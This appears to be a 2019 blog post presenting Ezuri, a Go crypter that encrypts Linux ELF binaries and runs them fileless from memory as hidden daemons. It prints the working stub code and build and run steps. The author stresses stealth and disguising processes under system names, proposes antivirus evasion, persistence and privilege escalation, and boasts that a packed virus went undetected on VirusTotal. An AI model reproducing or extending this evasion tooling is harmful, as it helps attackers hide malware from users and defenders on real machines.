



"Even for Elves, they were stealthy little twerps. They'd taken our measure before we'd even seen them." — Marshall Volnikov

memfd_create

What is it?

Last month I wrote a post about thesyscall and left some ideas in the end. Today I’m here to show an example of such ideas implemented in an ELF runtime crypter (kinda lame, I know but good for this demonstration).

Glad you asked. Ezuri is a small Go crypter that uses AES to encrypt a given file and merges it with a stub that will decrypt and execute the file from memory (using the previously mentioned memfd_create syscall). My original goal was to write it in Assembly but that would require more time so it is a task for the future.

It will also do some basic tricks during the process execution, making it a little bit harder to be detected by an inexperienced eye. The main trick consists on daemonizing the process, detaching it from a tty , having it to run in the background (and as I said, from memory). If you are not familiar with daemons, you can find more information here.

As usual, the full source code with more instructions can be found in my GitHub: https://github.com/guitmz/ezuri

It’s also worth mentioning that it ONLY works on 64 bits Linux systems, but you can easily adapt the code if necessary, I’m just lazy.

Where the magic happens

Remember this function from my last post?

func runFromMemory ( displayName string , filePath string ) { fdName := "" // *string cannot be initialized fd , _ , _ := syscall . Syscall ( memfdCreate , uintptr ( unsafe . Pointer ( & fdName )), uintptr ( mfdCloexec ), 0 ) buffer , _ := ioutil . ReadFile ( filePath ) _ , _ = syscall . Write ( int ( fd ), buffer ) fdPath := fmt . Sprintf ( "/proc/self/fd/%d" , fd ) _ = syscall . Exec ( fdPath , [] string { displayName }, nil ) }

That’s right, with some small adjustments, we can achieve our goal of running the target executable as a daemon:

func runFromMemory ( procName string , buffer [] byte ) { fdName := "" // *string cannot be initialized fd , _ , _ := syscall . Syscall ( memfdCreateX64 , uintptr ( unsafe . Pointer ( & fdName )), uintptr ( mfdCloexec ), 0 ) _ , _ = syscall . Write ( int ( fd ), buffer ) fdPath := fmt . Sprintf ( "/proc/self/fd/%d" , fd ) switch child , _ , _ := syscall . Syscall ( fork , 0 , 0 , 0 ); child { case 0 : break case 1 : // Fork failed! break default : // Parent exiting... os . Exit ( 0 ) } _ = syscall . Umask ( 0 ) _ , _ = syscall . Setsid () _ = syscall . Chdir ( "/" ) file , _ := os . OpenFile ( "/dev/null" , os . O_RDWR , 0 ) syscall . Dup2 ( int ( file . Fd ()), int ( os . Stdin . Fd ())) file . Close () _ = syscall . Exec ( fdPath , [] string { procName }, nil ) }

No proper error handling at this time (told you I was lazy). I am not displaying any messages if the fork fails because it wouldn’t be stealthy if I did, remember that this piece of code will run whenever somebody runs your encrypted file and we don’t want to raise any suspicions.

You will need Go and GCC installed and configured in your machine to proceed with the next section if you want to try Ezuri yourself.

See it in action

Let’s see this thing working then. A small C program will be used as a target executable here. The program will write a little demon into a file named log.txt in the current directory every second for as long as it’s running, because we are dealing with daemons! Got it? Demon, daemon…

Bad jokes aside, here’s the code:

#include <stdio.h> int main ( int argc , char ** argv ) { FILE * fp = fopen ( "/tmp/log.txt" , "w+" ); while ( 1 ) { sleep ( 1 ); fprintf ( fp , "I always wanted to be a DAEMON!

" ); fprintf ( fp , " | \\ ___/|

" ); fprintf ( fp , " / \\

" ); fprintf ( fp , "| / \\ __/|

" ); fprintf ( fp , "|| \\ <.><.>

" ); fprintf ( fp , "| _ > )

" ); fprintf ( fp , " \\ /----

" ); fprintf ( fp , " | - \\ /

" ); fprintf ( fp , " / \\



" ); fprintf ( fp , "Wait, something is not right...

" ); fflush ( fp ); } fclose ( fp ); return 0 ; }

Building demon.c :

$ gcc demon.c -o demon

We should also build Ezuri , running the following from inside of the folder that contains its source code:

$ go build -o ezuri .

The stub will be compiled during the crypter execution. After you enter your desired parameters like below:

$ ./ezuri [?] Path of file to be encrypted: demon [?] Path of output (encrypted) file: cryptedDemon [?] Name of the target process: DEMON [?] Encryption key (32 bits - random if empty): [?] Encryption IV (16 bits - random if empty): [!] Random encryption key (used in stub): R@7ya3fo1#y67rCtNOYwpm5lyOA5xeYY [!] Random encryption IV (used in stub): 5Ti65dgBKidm5%sA [!] Generating stub...

I chose to let Ezuri generate a encryption key for me but feel free to enter your own if you wish.

Now you should have a file named cryptedDemon in your current directory. This file contains the stub + demon (encrypted) executables (in this order, actually).

Execute cryptedDemon and inspect its process:

$ ./cryptedDemon $ ps -f $(pidof DEMON) UID PID PPID C STIME TTY STAT TIME CMD guitmz 18607 1 0 18:11 ? Ss 0:00 DEMON

Note that this time, you have ? for the tty , which means that the process is detached from any terminals and running in the background! Stealthy stuff!

If you check /tmp/log.txt file, you should see a bunch of little demons being inserted into the file like this:

$ tailf /tmp/log.txt I always wanted to be a DAEMON! |\___/| / \ | /\__/| ||\ | _ > ) \ /---- | -\/ / \ Wait, something is not right...

Finally, don’t forget to kill your test process:

$ kill $(pidof DEMON)

Final thoughts

If you give your process a proper name (something related to an actual Linux process, like firewalld , apparmor or even xorg ), it can be difficult to spot your shady executable.

Additionally, further work on this project can make it even more realiable (for example, avoiding antiviruses and reverse engineering). A few thoughts:

Deamon responding to process signals (such as SIGHUP, SIGKILL, etc) to restart its process if killed, for example. I may write a post about it in the future as I have already wrote some code that takes advantage of this.

Play around with the encryption method, the keys (like using multiple keys, removing the key from the stub somehow) and so on.

Something like autostarting with every user login could also be implemented.

Explore privilege escalation to run your process as root.

Those are all basic ideas. memfd_create has a lot of potential and can be combined with multiple techniques other than a simple crypter/dropper.

Update: I have packed my latest ELF prepender Linux.Cephei with Ezuri and uploaded to VirusTotal. Results are below:

Unpacked Linux.Cephei: https://www.virustotal.com/gui/file/35308b8b770d2d4f78299262f595a0769e55152cb432d0efc42292db01609a18/detection

Packed Linux.Cephei: https://www.virustotal.com/gui/file/ddbb714157f2ef91c1ec350cdf1d1f545290967f61491404c81b4e6e52f5c41f/detection

So as of today (May 2nd 2019), the Ezuri stub is undetected :)

Have fun and be responsible with this code, it’s for educational purposes only!

TMZ